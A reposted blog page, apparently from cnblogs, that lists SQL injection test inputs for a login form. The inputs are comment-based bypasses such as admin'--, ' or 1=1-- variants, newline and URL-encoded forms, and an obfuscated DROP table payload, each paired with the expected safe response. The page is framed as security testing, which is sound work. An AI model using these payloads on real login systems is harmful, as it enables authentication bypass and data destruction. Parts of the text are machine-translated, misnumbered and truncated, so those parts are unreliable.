zoukankan      html  css  js  c++  java

  • sql百态01-post

    第一个输入字段我喜欢测试“搜索引擎”和“登录表单”的一个网站,最下面的例子是测试一个“登录表单”。你应该旨在抑制任何错误消息和服务器响应在生产环境中,把开发人员调试。我们将假定接收脚本有一个最严重的SQL语句:

      1   SELECT *  
  2   FROM users  
  3   WHERE username='<submitted_username>'  
  4   AND password='<submitted_password>'

    1.Random SQL(随机的SQL):一些随机的SQL类型的输入值,看看服务器返回一个消息

    1   Username:     SELECT Username FROM Users WHERE ID=1 
2   Password:     SELECT MD5(Password) FROM Users WHERE ID=1 
  
 -- evaluates to: 
SELECT * FROM users WHERE username='SELECT Username FROM Users WHERE ID=1' AND password='SELECT MD5(Password) FROM Users WHERE ID=1' 

    Result should be "invalid username/password". Suppress any other messages

    2.wildcards(通配符):输入一个(*)作为输入值进而观察结

    1    Username:     * 
2    Password:     <Leave Blank> 
  
 -- evaluates to: 
 SELECT * FROM users WHERE username='*' AND password='' 

    Result should be "invalid username/password"

     3.comments-dashdash   输入一个一个已知的用户名(如:admin)作为输入,以及后缀注释命令(如:--)

    1    Username:     admin'-- 
2    Password:     <Leave Blank> 
  
 -- evaluates to: 
 SELECT * FROM users WHERE username='admin'--' AND password='' 

Result should be "invalid username/password".

     4.comments-hash     输入一个一个已知的用户名(如:admin)作为输入,以及后缀注释命令(如:#)

    1  Username:     admin'# 
2   Password:     <Leave Blank> 
  
 -- evaluates to: 
 SELECT * FROM users WHERE username='admin'#' AND password='' 

Result should be "invalid username/password"

     5.Comments - bypassing pattern matches (绕过模式的匹配) 测试目标主机系统正在寻找诸如DROP关键字或避免的黑名单

      Username:     ';DR/**/OP tempTable; 
2  Password:     <Leave Blank> 
  
 -- evaluates to: 
 SELECT * FROM users WHERE username='';DROP tempTable;' AND password=''

     5.The Classic  输入以下命令“ 'OR 1=1--”作为输入值,用知道存在的用户名替代“admin”

    1  Username:     admin 
2  Password:     ' or 1=1-- 
  
 -- evaluates to: 
 SELECT * FROM users WHERE username='admin' AND password='' OR 1=1--' 

Quick variations of this:  #这主要要看返回的什么错误,然后在具体应用
admin' --  
 admin' #  
 admin'/*  
 ' or 1=1--  
 ' or 1=1#  
 ' or 1=1/*  
 ') or '1'='1--  
 ') or ('1'='1--

     7.Variations of the Classic: Comments  根据具体的系统,尝试输入注释语法,用知道存在的用户名替代“admin”

    1  Username:     admin 
2  Password:     ' or 1=1 --IamJOE 
  
 -- evaluates to: 
 SELECT * FROM users WHERE username='admin' AND password='' OR 1=1 --IamJOE'

     8.Variations of the Classic: Empty 输入如:' or ' '=',用知道存在的用户名替换“admin”

    1  Username:     admin 
2  Password:      ' or ''=' 
  
 -- evaluates to: 
 SELECT * FROM users WHERE username='admin' AND password=' ' OR ''=''

     9.Variations of the Classic: NewLines(换行符) 某些脚本无法解析一个换行符,它是另一个查询或脚本修整提交的最后一行,用存在知道的用户名替“admin”

    1  Username:     admin 
2  Password:     ' 
               OR 1=1-- 
  
 -- evaluates to: 
 SELECT * FROM users WHERE username='admin' AND password='' 
               OR 1=1--' 

**New lines in SQL should be understood as 
.

     10.Variations of the Classic: URL Encoded  尽管可以躲避掉转义',这里最有可能通过一个系统得到攻击。事实,所有在此页面上的攻击,可以将网址编码。键入以下内容:%27%20or%20%27%27%3D%27的输入值。

    1  Username:     admin 
2  Password:     %27%20or%20%27%27%3D%27 
  
 -- evaluates to: 
 SELECT * FROM users WHERE username='admin' AND password='' OR ''='

     11.Guest Password 如果知道一个有效的username/password,check that your scripts do not validate on password alone.(空密码)

    1  Username:     Guest 
2  Password:     <Password you know exists in system> 
  
 -- evaluates to: 
 SELECT * FROM users WHERE username='Guest' AND password='<known_password>'
  • 相关阅读:
    Apache Ant 1.9.1 版发布
    Apache Subversion 1.8.0rc2 发布
    GNU Gatekeeper 3.3 发布,网关守护管理
    Jekyll 1.0 发布,Ruby 的静态网站生成器
    R语言 3.0.1 源码已经提交到 Github
    SymmetricDS 3.4.0 发布,数据同步和复制
    beego 0.6.0 版本发布,Go 应用框架
    Doxygen 1.8.4 发布,文档生成工具
    SunshineCRM 20130518发布,附带更新说明
    Semplice Linux 4 发布,轻量级发行版
  • 原文地址:https://www.cnblogs.com/Jdrops/p/5369620.html
Copyright © 2011-2022 走看看